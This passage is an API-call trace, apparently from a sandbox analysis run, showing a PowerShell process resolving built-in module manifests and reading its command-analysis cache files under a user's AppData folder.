[0282.621] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.621] GetCurrentProcess () returned 0xffffffffffffffff [0282.621] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa98) returned 1 [0282.621] GetTokenInformation (in: TokenHandle=0xa98, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.621] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984af0 [0282.622] GetTokenInformation (in: TokenHandle=0xa98, TokenInformationClass=0x1, TokenInformation=0x25b73984af0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984af0, ReturnLength=0x653ef8d6b8) returned 1 [0282.622] LocalFree (hMem=0x25b73984af0) returned 0x0 [0282.622] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c84f2e0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c84f2e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.623] CreateMutexW (lpMutexAttributes=0x25b5c84f430, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa9c [0282.623] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa9c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.623] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.623] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.623] CoTaskMemFree (pv=0x25b73d007a0) [0282.623] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", lpFilePart=0x0) returned 0x57 [0282.623] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement\\printmanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c84fa98 | out: lpFileInformation=0x25b5c84fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2131e00c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2131e00c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2131e00c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20ec)) returned 1 [0282.624] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.624] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b6ece8f2-ac4b-48ef-b3e1-cc00ac2ef6ed", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b6ece8f2-ac4b-48ef-b3e1-cc00ac2ef6ed", lpFilePart=0x0) returned 0x93 [0282.624] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b6ece8f2-ac4b-48ef-b3e1-cc00ac2ef6ed" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_b6ece8f2-ac4b-48ef-b3e1-cc00ac2ef6ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xaa0 [0282.625] GetFileType (hFile=0xaa0) returned 0x1 [0282.625] GetFileType (hFile=0xaa0) returned 0x1 [0282.625] ReadFile (in: hFile=0xaa0, lpBuffer=0x25b5c850d48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c850d48*, lpNumberOfBytesRead=0x653ef8d338*=0xab3, lpOverlapped=0x0) returned 1 [0282.658] ReadFile (in: hFile=0xaa0, lpBuffer=0x25b5c850d48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c850d48*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.658] CloseHandle (hObject=0xaa0) returned 1 [0282.658] ReleaseMutex (hMutex=0xa9c) returned 1 [0282.658] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0282.658] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfcc20 [0282.658] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfcc20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.658] CoTaskMemFree (pv=0x25b73cfcc20) [0282.658] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfae60 [0282.658] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfae60 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.659] CoTaskMemFree (pv=0x25b73cfae60) [0282.659] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.659] GetCurrentProcess () returned 0xffffffffffffffff [0282.659] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xaa0) returned 1 [0282.659] GetTokenInformation (in: TokenHandle=0xaa0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.659] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739843f0 [0282.659] GetTokenInformation (in: TokenHandle=0xaa0, TokenInformationClass=0x1, TokenInformation=0x25b739843f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739843f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.660] LocalFree (hMem=0x25b739843f0) returned 0x0 [0282.660] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c856a40, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c856a40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.660] CreateMutexW (lpMutexAttributes=0x25b5c856b90, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xaa4 [0282.660] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xaa4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.660] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.661] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.661] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.661] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0282.661] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c857228 | out: lpFileInformation=0x25b5c857228*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fa88f17, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5fa88f17, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5fa88f17, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198)) returned 1 [0282.661] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.661] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.661] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2082700d-565f-45fe-aff6-63b66eda78f8", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2082700d-565f-45fe-aff6-63b66eda78f8", lpFilePart=0x0) returned 0x93 [0282.661] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2082700d-565f-45fe-aff6-63b66eda78f8" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_2082700d-565f-45fe-aff6-63b66eda78f8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xaa8 [0282.662] GetFileType (hFile=0xaa8) returned 0x1 [0282.662] GetFileType (hFile=0xaa8) returned 0x1 [0282.662] ReadFile (in: hFile=0xaa8, lpBuffer=0x25b5c858520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c858520*, lpNumberOfBytesRead=0x653ef8d338*=0xc74, lpOverlapped=0x0) returned 1 [0282.667] ReadFile (in: hFile=0xaa8, lpBuffer=0x25b5c858520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c858520*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.667] CloseHandle (hObject=0xaa8) returned 1 [0282.667] ReleaseMutex (hMutex=0xaa4) returned 1 [0282.667] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0282.667] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.668] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.668] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.668] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfdf40 [0282.668] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfdf40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.668] CoTaskMemFree (pv=0x25b73cfdf40) [0282.668] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.668] GetCurrentProcess () returned 0xffffffffffffffff [0282.668] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xaa8) returned 1 [0282.668] GetTokenInformation (in: TokenHandle=0xaa8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.668] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739841b0 [0282.668] GetTokenInformation (in: TokenHandle=0xaa8, TokenInformationClass=0x1, TokenInformation=0x25b739841b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739841b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.669] LocalFree (hMem=0x25b739841b0) returned 0x0 [0282.669] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c85e5e8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c85e5e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.669] CreateMutexW (lpMutexAttributes=0x25b5c85e738, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xaac [0282.669] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xaac, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.669] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.669] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.669] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.670] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0282.670] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c85ed98 | out: lpFileInformation=0x25b5c85ed98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6cda18, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x995ced79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x995ced79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e)) returned 1 [0282.670] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.670] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.670] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f43e45e7-eef6-4380-a936-f696031c993f", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f43e45e7-eef6-4380-a936-f696031c993f", lpFilePart=0x0) returned 0x93 [0282.670] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f43e45e7-eef6-4380-a936-f696031c993f" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_f43e45e7-eef6-4380-a936-f696031c993f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xab0 [0282.671] GetFileType (hFile=0xab0) returned 0x1 [0282.671] GetFileType (hFile=0xab0) returned 0x1 [0282.671] ReadFile (in: hFile=0xab0, lpBuffer=0x25b5c860038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c860038*, lpNumberOfBytesRead=0x653ef8d338*=0x5f5, lpOverlapped=0x0) returned 1 [0282.675] ReadFile (in: hFile=0xab0, lpBuffer=0x25b5c860038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c860038*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.675] CloseHandle (hObject=0xab0) returned 1 [0282.675] ReleaseMutex (hMutex=0xaac) returned 1 [0282.675] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0282.675] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.675] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.675] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.675] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfca00 [0282.675] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfca00 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.675] CoTaskMemFree (pv=0x25b73cfca00) [0282.676] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.676] GetCurrentProcess () returned 0xffffffffffffffff [0282.676] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xab0) returned 1 [0282.676] GetTokenInformation (in: TokenHandle=0xab0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.676] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984970 [0282.676] GetTokenInformation (in: TokenHandle=0xab0, TokenInformationClass=0x1, TokenInformation=0x25b73984970, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984970, ReturnLength=0x653ef8d6b8) returned 1 [0282.677] LocalFree (hMem=0x25b73984970) returned 0x0 [0282.677] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c864b38, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c864b38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.677] CreateMutexW (lpMutexAttributes=0x25b5c864c88, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xab4 [0282.677] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xab4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.677] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb4c0 [0282.677] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb4c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.678] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.678] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0282.678] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c8652e8 | out: lpFileInformation=0x25b5c8652e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f01a5ef, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f01a5ef, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f01a5ef, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3be)) returned 1 [0282.678] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.678] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_bb0bf3e8-6bf6-4825-9576-5c9ab6654eb2", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_bb0bf3e8-6bf6-4825-9576-5c9ab6654eb2", lpFilePart=0x0) returned 0x93 [0282.678] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_bb0bf3e8-6bf6-4825-9576-5c9ab6654eb2" (normalized: 